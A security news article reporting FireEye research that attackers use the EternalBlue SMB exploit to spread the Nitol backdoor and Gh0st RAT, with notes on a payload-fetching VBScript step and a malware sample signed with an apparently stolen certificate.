The EternalBlue Exploit Deployed to Deliver Backdoor.Nitol, Gh0st RAT
NEWS

The EternalBlue Exploit Deployed to Deliver Backdoor.Nitol, Gh0st RAT

The now-infamous EternalBlue exploit deployed in the WannaCry ransomware outbreak and in the distribution of the Adylkuzz miner is now being used to deliver the Nitol backdoor and Gh0st RAT. Both threats have been around for several years and are once again included in malicious operations.

The SMB Flaw from WannaCry and Adylkuzz Campaigns Deployed Once Again

FireEye researchers say that the criminals behind this campaign are once again using the very same SMB flaw (MS017-010) that was leveraged for the distribution of WannaCry.

We observed lab machines vulnerable to the SMB exploit were attacked by a threat actor using the EternalBlue exploit to gain shell access to the machine,” FireEye researchers recently shared.

More about Gh0st RAT

As already mentioned, the RAT has been deployed in various malicious operations for many years. Interestingly, its primary use is as a nation-state tool for APT attacks against government agencies and politically-engaged targets. Gh0st RAT was also one of the backdoors searched for by Malware Hunter, the “specialized Shodan crawler that explores the Internet looking for command & control (C2s) servers for botnets”.

Related Story: Malware Hunter Locates the Command and Control Centers of Botnets

More about Backdoor.Nitol

Nitol, or Backdoor.Nitol has been part of operations built upon a remote code execution flaw using the ADODB.Stream ActiveX Object affecting older versions of Internet Explorer, FireEye researchers say. Interestingly, both Nitol and Gh0st have been distributed via the CVE-2014-6332 vulnerability and in spam campaigns targeting PowerShell commands.

The initial exploit technique used at the SMB level (by Backdoor.Nitol and Gh0st) is similar to what we have been seen in WannaCry campaigns; however, once a machine is successfully infected, this particular attack opens a shell to write instructions into a VBScript file and then executes it to fetch the payload on another server.

Gh0st RAT Sample Signed with Stolen Certificate

According to researchers, the combination of EternalBlue and VBScript has been spreading Nitol in Singapore and Nitol in South Asia. Also, the samples acquired by FireEye were signed with a common digital certificate which is most likely stolen:

The Gh0St RAT sample observed in this attack, as well as other associated samples identified by FireEye are all signed with a common digital certificate purporting to be from 北京研创达科技有限公司 (Beijing Institute of Science and Technology Co., Ltd). Stolen or illegitimately purchased code signing certificates are increasingly used to lend legitimacy to malware. See the appendix for full details on the observed code signing certificate.

Related Story: EternalRocks Worm More Powerful Than WannaCry SMB Worm

In conclusion, the addition of EternalBlue to Metasploit has made things very easy for attackers to exploit these flaws. Researchers expect more threat groups to start leveraging the same vulnerabilities to deliver different payloads.

Milena Dimitrova

An inspired writer and content manager who has been with SensorsTechForum for 4 years. Enjoys ‘Mr. Robot’ and fears ‘1984’. Focused on user privacy and malware development, she strongly believes in a world where cybersecurity plays a central role. If common sense makes no sense, she will be there to take notes. Those notes may later turn into articles!

More Posts

Leave a Comment

Your email address will not be published. Required fields are marked *

Time limit is exhausted. Please reload CAPTCHA.

Share on Facebook Share
Loading...
Share on Twitter Tweet
Loading...
Share on Google Plus Share
Loading...
Share on Linkedin Share
Loading...
Share on Digg Share
Share on Reddit Share
Loading...
Share on Stumbleupon Share
Loading...